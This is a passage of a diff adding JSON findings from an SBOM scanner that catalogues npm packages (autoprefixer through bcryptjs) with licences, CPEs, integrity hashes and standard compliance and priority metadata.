"pkg:npm/autoprefixer@10.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.5.0.tgz", + "integrity": "sha512-FMhOoZV4+qR6aTUALKX2rEqGG+oyATvwBt9IIzVR5rMa2HRWPkxf+P+PAJLD1I/H5/II+HuZcBJYEFBpq39ong==", + "dependencies": { + "browserslist": "^4.28.2", + "caniuse-lite": "^1.0.30001787", + "fraction.js": "^5.3.4", + "picocolors": "^1.1.1", + "postcss-value-parser": "^4.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fba99cf19e7cc071", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: axios 1.15.2", + "title": "axios 1.15.2", + "description": "Package discovered: axios 1.15.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "691f5259c0d155d0", + "name": "axios", + "version": "1.15.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:axios:axios:1.15.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/axios@1.15.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/axios/-/axios-1.15.2.tgz", + "integrity": "sha512-wLrXxPtcrPTsNlJmKjkPnNPK2Ihe0hn0wGSaTEiHRPxwjvJwT3hKmXF4dpqxmPO9SoNb2FsYXj/xEo0gHN+D5A==", + "dependencies": { + "follow-redirects": "^1.15.11", + "form-data": "^4.0.5", + "proxy-from-env": "^2.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "15b2afab0d6c8b1b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: balanced-match 1.0.2", + "title": "balanced-match 1.0.2", + "description": "Package discovered: balanced-match 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0d7c80c1e227b7e2", + "name": "balanced-match", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:balanced-match:balanced-match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:balanced-match:balanced_match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:balanced_match:balanced-match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:balanced_match:balanced_match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:balanced:balanced-match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:balanced:balanced_match:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/balanced-match@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e3263834d404d719", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: base64-js 0.0.8", + "title": "base64-js 0.0.8", + "description": "Package discovered: base64-js 0.0.8", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "b2d621b6dd16cf05", + "name": "base64-js", + "version": "0.0.8", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:base64-js:base64-js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64-js:base64_js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64_js:base64-js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64_js:base64_js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64:base64-js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64:base64_js:0.0.8:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/base64-js@0.0.8", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-0.0.8.tgz", + "integrity": "sha512-3XSA2cR/h/73EzlXXdU6YNycmYI7+kicTxks4eJg2g39biHR84slg2+des+p7iHYhbRg/udIS4TD53WabcOUkw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "277066fc01f56c50", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: base64-js 1.5.1", + "title": "base64-js 1.5.1", + "description": "Package discovered: base64-js 1.5.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "c7ab39b9720e240f", + "name": "base64-js", + "version": "1.5.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:base64-js:base64-js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64-js:base64_js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64_js:base64-js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64_js:base64_js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64:base64-js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:base64:base64_js:1.5.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/base64-js@1.5.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/base64-js/-/base64-js-1.5.1.tgz", + "integrity": "sha512-AKpaYlHn8t4SVbOHCy+b5+KKgvR4vrsD8vbvrbiQJps7fKDTkjkDry6ji0rUJjC0kzbNePLwzxq8iypo41qeWA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d8b667ce3a0cff7b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: base64id 2.0.0", + "title": "base64id 2.0.0", + "description": "Package discovered: base64id 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "224462b6727019f7", + "name": "base64id", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:base64id:base64id:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/base64id@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", + "integrity": "sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b03c61c0d46ca441", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: baseline-browser-mapping 2.10.24", + "title": "baseline-browser-mapping 2.10.24", + "description": "Package discovered: baseline-browser-mapping 2.10.24", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "013c8659dba6bad8", + "name": "baseline-browser-mapping", + "version": "2.10.24", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:baseline-browser-mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline-browser-mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline_browser_mapping:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline_browser_mapping:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline-browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline-browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline_browser:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline_browser:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline:baseline-browser-mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:baseline:baseline_browser_mapping:2.10.24:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/baseline-browser-mapping@2.10.24", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/baseline-browser-mapping/-/baseline-browser-mapping-2.10.24.tgz", + "integrity": "sha512-I2NkZOOrj2XuguvWCK6OVh9GavsNjZjK908Rq3mIBK25+GD8vPX5w2WdxVqnQ7xx3SrZJiCiZFu+/Oz50oSYSA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "83b4bdfed9e1341d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: basic-auth 2.0.1", + "title": "basic-auth 2.0.1", + "description": "Package discovered: basic-auth 2.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3e5df9b4f6b62db4", + "name": "basic-auth", + "version": "2.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:basic-auth:basic-auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:basic-auth:basic_auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:basic_auth:basic-auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:basic_auth:basic_auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:basic:basic-auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:basic:basic_auth:2.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/basic-auth@2.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", + "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", + "dependencies": { + "safe-buffer": "5.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "673442d13a9240b9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: bcryptjs 2.4.3", + "title": "bcryptjs 2.4.3", + "description": "Package discovered: bcryptjs 2.4.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "06243f2e41cd3912", + "name": "bcryptjs", + "version": "2.4.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:bcryptjs:bcryptjs:2.4.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/bcryptjs@2.4.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", + "integrity": "sha512-V/Hy/X9Vt7f3BbPJEi8BdVFMByHi+jNXrYkW3huaybV/kQ0KJg0Y6PkEMbn+zeT+i+SiKZ/HMqJGIIt4LZDqNQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": 